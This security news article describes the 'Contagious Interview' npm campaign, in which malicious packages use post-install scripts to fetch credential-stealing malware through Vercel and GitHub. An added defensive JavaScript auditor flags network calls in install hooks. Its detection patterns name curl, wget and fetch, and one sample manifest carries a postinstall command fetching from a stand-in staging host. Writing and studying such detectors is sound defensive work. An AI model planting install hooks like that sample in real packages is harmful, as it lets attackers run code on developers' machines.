
Contagious Interview attackers go ‘full stack’ to fool you



When an unsuspecting developer installs such a package, a post-install script triggers and reaches out to a staging endpoint hosted on Vercel. That endpoint in turn delivers a live payload fetched from a threat-actor-controlled GitHub account named “stardev0914”. From there the payload, a variant of OtterCookie that also folds in capabilities from the campaign’s other signature payload, BeaverTail, executes and establishes a remote connection to the attackers’ command-and-control server. The malware then silently harvests credentials, crypto-wallet data, browser profiles and more.

“Tracing the malicious npm package tailwind-magic led us to a Vercel-hosted staging endpoint, tetrismic[.]vercel[.]app, and from there to the threat actor controlled GitHub account which contained 18 repositories,” Socket’s senior threat intelligence analyst Kirill Boychenko said in a blog post, crediting related research by Kieran Miyamoto that helped confirm the malicious GitHub account stardev0914.

A ‘full stack’ adversary: GitHub, Vercel, and NPM

What makes this campaign stand out is the layered infrastructure behind it. Socket’s analysis traced not just the NPM packages but also how the attackers built an entire delivery pipeline: malware-serving repositories on GitHub, staging servers on Vercel, and separate C2 servers for exfiltration and remote command execution.
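A defender-side check for the install-time step described above, added here as an example and not taken from Socket’s research or the article: it audits parsed package.json manifests for lifecycle hooks that reach out to the network or a Vercel-hosted staging endpoint. The package names, the `example-staging.vercel.app` host and the sample manifests are constructed; the regex list is a heuristic, not a signature for this campaign.

```javascript
// Added example: audit npm lifecycle scripts for the behaviour described above
// (a post-install hook that fetches code from a staging host). Heuristics only.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicators that an install-time script reaches the network or runs code it did
// not ship with. A match is a reason to review the package, not proof of malice.
const NETWORK_PATTERNS = {
  curl: /\bcurl\b/i, wget: /\bwget\b/i, fetch: /\bfetch\s*\(/i,
  url: /\bhttps?:\/\/[^\s"']+/i, 'inline-node': /\bnode\s+-e\b/i,
  eval: /\beval\s*\(/i, base64: /\bbase64\b|\batob\s*\(/i,
};

// The page names a *.vercel.app staging endpoint (tetrismic[.]vercel[.]app);
// any vercel.app host inside an install hook is scored high. Extend as needed.
const STAGING_HOST_RE = /\b[\w.-]+\.vercel\.app\b/i;

// One finding per lifecycle hook present in a parsed package.json object.
function auditInstallScripts(pkg) {
  const findings = [];
  const scripts = pkg.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (typeof command !== 'string') continue;
    const reasons = Object.entries(NETWORK_PATTERNS)
      .filter(([, re]) => re.test(command))
      .map(([label]) => label);
    const host = command.match(STAGING_HOST_RE);
    if (host) reasons.push(`host:${host[0].toLowerCase()}`);
    const severity = host ? 'high' : reasons.length ? 'medium' : 'info';
    findings.push({ package: pkg.name, hook, command, severity, reasons });
  }
  return findings;
}

// Audit every parsed package.json in a list (e.g. all of node_modules).
function auditAll(packages) {
  return packages.flatMap(auditInstallScripts);
}

// Constructed sample manifests, not real packages: no hooks, a benign native
// build step, and one shaped like the post-install fetch described on the page.
const SAMPLE_PACKAGES = [
  { name: 'plain-lib', version: '1.0.0', scripts: { test: 'mocha' } },
  { name: 'native-addon', version: '2.1.0', scripts: { install: 'node-gyp rebuild' } },
  { name: 'lookalike-ui', version: '0.0.1',
    scripts: { postinstall: 'node -e "fetch(\'https://example-staging.vercel.app/s\')"' } },
];

console.log(JSON.stringify(auditAll(SAMPLE_PACKAGES), null, 2));
```

Feed it the package.json of every directory under node_modules and review anything scored medium or high before the install is allowed to proceed.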
